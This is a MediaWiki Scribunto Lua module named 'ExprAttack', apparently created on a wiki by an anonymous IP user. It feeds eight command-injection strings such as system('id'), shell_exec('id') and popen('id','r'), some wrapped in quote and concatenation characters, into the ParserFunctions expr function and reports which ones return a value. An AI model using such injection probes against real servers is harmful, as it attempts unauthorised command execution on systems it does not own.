模块:ExprAttack

221.237.85.128讨论2026年5月9日 (六) 14:57的版本 (创建页面,内容为“local p = {} function p.test() local pf = mw.ext.ParserFunctions if not pf or not pf.expr then return "no_expr" end local results = {} -- Try injecting system commands through expr local injections = { "system('id')", "eval('system', 'id')", "exec('id')", "shell_exec('id')", "passthru('id')", "popen('id', 'r')", "' . system('id') . '", "'+system('id')+'", } for _, inj…”)


--- Scribunto module that hands a fixed list of non-arithmetic strings to the
-- ParserFunctions `expr` binding and reports, per string, whether the call
-- raised or returned a value.
local p = {}

-- Strings passed to expr, one call each. They are spelled like
-- command-execution function calls, bare and wrapped in quote/concatenation
-- characters; none of them is an arithmetic expression.
local PROBE_INPUTS = {
    "system('id')",
    "eval('system', 'id')",
    "exec('id')",
    "shell_exec('id')",
    "passthru('id')",
    "popen('id', 'r')",
    "' . system('id') . '",
    "'+system('id')+'",
}

-- Truncation limits applied to the report: input label and returned value.
local LABEL_WIDTH = 30
local VALUE_WIDTH = 100

--- Run every probe string through expr under pcall and summarise the outcome.
-- Each entry has the form `<input>=<status>`. The status is "false" when the
-- call raised (the error text itself is not recorded), "true" when it returned
-- nil/false, and "true:<value>" when it returned a truthy value.
-- For a reviewer reading the output, any "true:" entry is the one to examine:
-- it means expr returned a value for that string instead of rejecting it.
-- @treturn string entries joined with " | ", or "no_expr" when
--   mw.ext.ParserFunctions or its expr function is not available
function p.test()
    local pf = mw.ext.ParserFunctions
    if not (pf and pf.expr) then
        return "no_expr"
    end

    local report = {}

    for i = 1, #PROBE_INPUTS do
        local input = PROBE_INPUTS[i]
        -- pcall keeps one raising input from aborting the remaining calls.
        local succeeded, value = pcall(pf.expr, input)

        local outcome
        if succeeded and value then
            outcome = "true:" .. tostring(value):sub(1, VALUE_WIDTH)
        else
            outcome = tostring(succeeded)
        end

        report[i] = input:sub(1, LABEL_WIDTH) .. "=" .. outcome
    end

    return table.concat(report, " | ")
end

return p